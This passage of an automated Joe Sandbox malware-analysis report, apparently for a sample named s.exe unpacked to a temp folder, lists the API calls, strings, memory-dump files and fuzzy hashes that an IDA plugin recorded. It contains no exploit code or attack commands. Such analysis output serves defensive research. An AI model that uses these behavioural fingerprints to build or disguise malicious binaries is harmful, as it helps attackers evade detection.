                                                                                                                                            • Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4
                                                                                                                                          • _free.LIBCMT ref: 0010C829
                                                                                                                                          • _free.LIBCMT ref: 0010C83B
                                                                                                                                          • _free.LIBCMT ref: 0010C84D
                                                                                                                                          • _free.LIBCMT ref: 0010C85F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                          • Opcode ID: 92501a5835f76e4840cf275d92b979c892bf7cf14460b67b1efc916bac95bb98
                                                                                                                                          • Instruction ID: 7ac0d6df02ca408190009e828812018871c9ea1ee81dbab48b347bc1b22f98bd
                                                                                                                                          • Opcode Fuzzy Hash: 92501a5835f76e4840cf275d92b979c892bf7cf14460b67b1efc916bac95bb98
                                                                                                                                          • Instruction Fuzzy Hash: E4F04F32515205ABC624DBE8E585C4A77E9AB54710754891AF5C8D79D2CBB0FC808B98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _wcslen.LIBCMT ref: 000F1FE5
                                                                                                                                          • _wcslen.LIBCMT ref: 000F1FF6
                                                                                                                                          • _wcslen.LIBCMT ref: 000F2006
                                                                                                                                          • _wcslen.LIBCMT ref: 000F2014
                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,000EB371,?,?,00000000,?,?,?), ref: 000F202F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen$CompareString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3397213944-0
                                                                                                                                          • Opcode ID: ec4a1c0b03ae22f90ddad55226f316e3dbf784749fe7345f49dd13ce9423b6d2
                                                                                                                                          • Instruction ID: fa8aa6a14dfc0ca672052fbd49b97e77df421479b17711ff7f727a5dd0e95d3c
                                                                                                                                          • Opcode Fuzzy Hash: ec4a1c0b03ae22f90ddad55226f316e3dbf784749fe7345f49dd13ce9423b6d2
                                                                                                                                          • Instruction Fuzzy Hash: 07F06D33008018BBCF225F50EC09DCE3F2AEB54760B118105F62A5A0A2CBB296A1E690
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
                                                                                                                                          • IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
                                                                                                                                          • TranslateMessage.USER32(?), ref: 000FB5AC
                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000FB5B6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1266772231-0
                                                                                                                                          • Opcode ID: eb705b997728b59e7db6513b05f80e0d991e25ca168f98ba53eb34689a570e0f
                                                                                                                                          • Instruction ID: 38fc97c833946c7084c5c843d1e08c0ce2f44ed59b04700b6faa352cea25e443
                                                                                                                                          • Opcode Fuzzy Hash: eb705b997728b59e7db6513b05f80e0d991e25ca168f98ba53eb34689a570e0f
                                                                                                                                          • Instruction Fuzzy Hash: B1F0BD75A0111AAB8B20ABE5EC4CEEF7FACEF067917004515B519D3820EB38D646CBB0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _free.LIBCMT ref: 0010891E
                                                                                                                                            • Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
                                                                                                                                            • Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4
                                                                                                                                          • _free.LIBCMT ref: 00108930
                                                                                                                                          • _free.LIBCMT ref: 00108943
                                                                                                                                          • _free.LIBCMT ref: 00108954
                                                                                                                                          • _free.LIBCMT ref: 00108965
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                          • Opcode ID: 6f9eedac53249d998f73f79b40b2149ebf55e9eadeaa09db4562da46c473cb4d
                                                                                                                                          • Instruction ID: a12258e99d03441b1b62c62b2d249147937308ca2ab627d1f8c6e96eb0ba5728
                                                                                                                                          • Opcode Fuzzy Hash: 6f9eedac53249d998f73f79b40b2149ebf55e9eadeaa09db4562da46c473cb4d
                                                                                                                                          • Instruction Fuzzy Hash: 15F03A798255278BC60A6F94FD028453FA1F7267143810706F89852AF1DBF149C29B81
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _swprintf
                                                                                                                                          • String ID: %ls$%s: %s
                                                                                                                                          • API String ID: 589789837-2259941744
                                                                                                                                          • Opcode ID: f82aeaebbb0a5fe8dc06ab8fded3597feda85be80254311dda2f8a8969a9e45d
                                                                                                                                          • Instruction ID: 4e039d7ee95fe79b197c262103ae568b127abb003e220e1f1c2f2d2bb0fb15d4
                                                                                                                                          • Opcode Fuzzy Hash: f82aeaebbb0a5fe8dc06ab8fded3597feda85be80254311dda2f8a8969a9e45d
                                                                                                                                          • Instruction Fuzzy Hash: 8F51ED3524C34CFAF63126908E46FFD76666B05B44F244506F39AB8CD2CDB3A451BB1A
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe,00000104), ref: 00107FAE
                                                                                                                                          • _free.LIBCMT ref: 00108079
                                                                                                                                          • _free.LIBCMT ref: 00108083
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
                                                                                                                                          • API String ID: 2506810119-2207872565
                                                                                                                                          • Opcode ID: fe081a924816625d939cb1b6a7cd0e26ae53494c5878d4bfe11cfb495ee6458a
                                                                                                                                          • Instruction ID: 0298a2241dc1bd709d06071c626f68dbe6cc8ced8de0ff28c891df0e06b7ad52
                                                                                                                                          • Opcode Fuzzy Hash: fe081a924816625d939cb1b6a7cd0e26ae53494c5878d4bfe11cfb495ee6458a
                                                                                                                                          • Instruction Fuzzy Hash: 9231C271A08209AFCB21DF95DC8099EBBFCEF95310F11406AF88497295DBF09E85CB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001031FB
                                                                                                                                          • _abort.LIBCMT ref: 00103306
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: EncodePointer_abort
                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                          • API String ID: 948111806-2084237596
                                                                                                                                          • Opcode ID: ebb9b1326c3417b62d4c4ff17d5a82321f8589fe306817e7e8984f5dd36ad299
                                                                                                                                          • Instruction ID: e3f33122d1bbb95d478b42daec992b2c2a4f578e296cf7af8999161e0b2ce252
                                                                                                                                          • Opcode Fuzzy Hash: ebb9b1326c3417b62d4c4ff17d5a82321f8589fe306817e7e8984f5dd36ad299
                                                                                                                                          • Instruction Fuzzy Hash: 91416871900209AFCF16DF98CD81AEEBBB9BF08304F188059F954A7291D7B5AA50DB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E7406
                                                                                                                                            • Part of subcall function 000E3BBA: __EH_prolog.LIBCMT ref: 000E3BBF
                                                                                                                                          • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 000E74CD
                                                                                                                                            • Part of subcall function 000E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000E7AAB
                                                                                                                                            • Part of subcall function 000E7A9C: GetLastError.KERNEL32 ref: 000E7AF1
                                                                                                                                            • Part of subcall function 000E7A9C: CloseHandle.KERNEL32(?), ref: 000E7B00
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                          • API String ID: 3813983858-639343689
                                                                                                                                          • Opcode ID: dcd757ea00d78783346c73c9423e6d05b10f3f2d0feb3746665636e8695febe6
                                                                                                                                          • Instruction ID: aefa60120a8cb7e1fc4165d8ee85bf27cb9ced97f0fa8ef008f49ba0c5c9e0dc
                                                                                                                                          • Opcode Fuzzy Hash: dcd757ea00d78783346c73c9423e6d05b10f3f2d0feb3746665636e8695febe6
                                                                                                                                          • Instruction Fuzzy Hash: 2131F2B2D04288BEDF11EBA5DC45BEEBBB8AF59300F044015F509B7193C7708A84CB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                            • Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 000FAD98
                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 000FADAD
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 000FADC2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                          • String ID: ASKNEXTVOL
                                                                                                                                          • API String ID: 445417207-3402441367
                                                                                                                                          • Opcode ID: d62bc222ca2aca02a3769eaa865b45cbf3a69f91c744fad31cd94c08e4cc2e60
                                                                                                                                          • Instruction ID: decec690e5eddd5a23f750159be433c88aa238bd055adc807d11323a84e29def
                                                                                                                                          • Opcode Fuzzy Hash: d62bc222ca2aca02a3769eaa865b45cbf3a69f91c744fad31cd94c08e4cc2e60
                                                                                                                                          • Instruction Fuzzy Hash: 08118472380204BFD7619F68EC45FBA77A9AB4B742F000110F346EBDB1C761A985A722
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __fprintf_l.LIBCMT ref: 000ED954
                                                                                                                                          • _strncpy.LIBCMT ref: 000ED99A
                                                                                                                                            • Part of subcall function 000F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00121030,?,000ED928,00000000,?,00000050,00121030), ref: 000F1DC4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                          • String ID: $%s$@%s
                                                                                                                                          • API String ID: 562999700-834177443
                                                                                                                                          • Opcode ID: 96e56d494c3561048485e6fccdaba1155547392186f10cffafe3c6f4083f79f4
                                                                                                                                          • Instruction ID: fe0204cda61b9c3fbd8aede6463f3ce39c61e8f5def709e97881f1fe8d64474b
                                                                                                                                          • Opcode Fuzzy Hash: 96e56d494c3561048485e6fccdaba1155547392186f10cffafe3c6f4083f79f4
                                                                                                                                          • Instruction Fuzzy Hash: E121903244028CEEDB21EEA5CC41FEE7BE8EF05700F040122FA60A61A3E371D6588B51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000EAC5A,00000008,?,00000000,?,000ED22D,?,00000000), ref: 000F0E85
                                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000EAC5A,00000008,?,00000000,?,000ED22D,?,00000000), ref: 000F0E8F
                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000EAC5A,00000008,?,00000000,?,000ED22D,?,00000000), ref: 000F0E9F
                                                                                                                                          Strings
                                                                                                                                          • Thread pool initialization failed., xrefs: 000F0EB7
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                          • String ID: Thread pool initialization failed.
                                                                                                                                          • API String ID: 3340455307-2182114853
                                                                                                                                          • Opcode ID: 28496ae513ef29f0ce095c853dabf032cfd7adb5fcb5860ad800d6648aaf95f3
                                                                                                                                          • Instruction ID: c875f808675ffeddc6acec2ba1b75f94044700faf2c22cef030055069c5ee1ed
                                                                                                                                          • Opcode Fuzzy Hash: 28496ae513ef29f0ce095c853dabf032cfd7adb5fcb5860ad800d6648aaf95f3
                                                                                                                                          • Instruction Fuzzy Hash: B41151B164070C9FC3315F669D849A7FBECEB69744F10882EF1DAC2601D67159809B64
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                            • Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 000FB2BE
                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 000FB2D6
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 000FB304
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                          • String ID: GETPASSWORD1
                                                                                                                                          • API String ID: 445417207-3292211884
                                                                                                                                          • Opcode ID: de38d3c7951ba1fa23c169fdc74fb353f74b66113cb14cca16354e2437346dd1
                                                                                                                                          • Instruction ID: 8432c633fd6c148bef9cf4835015883be5a3c7c0f9e14b93b4217eee5a35bdef
                                                                                                                                          • Opcode Fuzzy Hash: de38d3c7951ba1fa23c169fdc74fb353f74b66113cb14cca16354e2437346dd1
                                                                                                                                          • Instruction Fuzzy Hash: 1611A532A40119BADB619AB4DD49FFE376CEB5A754F100020FB45B38D0C7A09A45AB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                          • API String ID: 0-56093855
                                                                                                                                          • Opcode ID: fa3fc929cb97725f40bca9c4df71b5ae9e5365bf9119cee4b777f1e6390243d8
                                                                                                                                          • Instruction ID: bf3c3f963900ea0848c294b1dbcf8f5b00d8379a95b0da33e288220283601935
                                                                                                                                          • Opcode Fuzzy Hash: fa3fc929cb97725f40bca9c4df71b5ae9e5365bf9119cee4b777f1e6390243d8
                                                                                                                                          • Instruction Fuzzy Hash: 2C015E76604289BFD761AF54FC44AAA7BEAF759354B000426FA0593E70C63198E1EBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
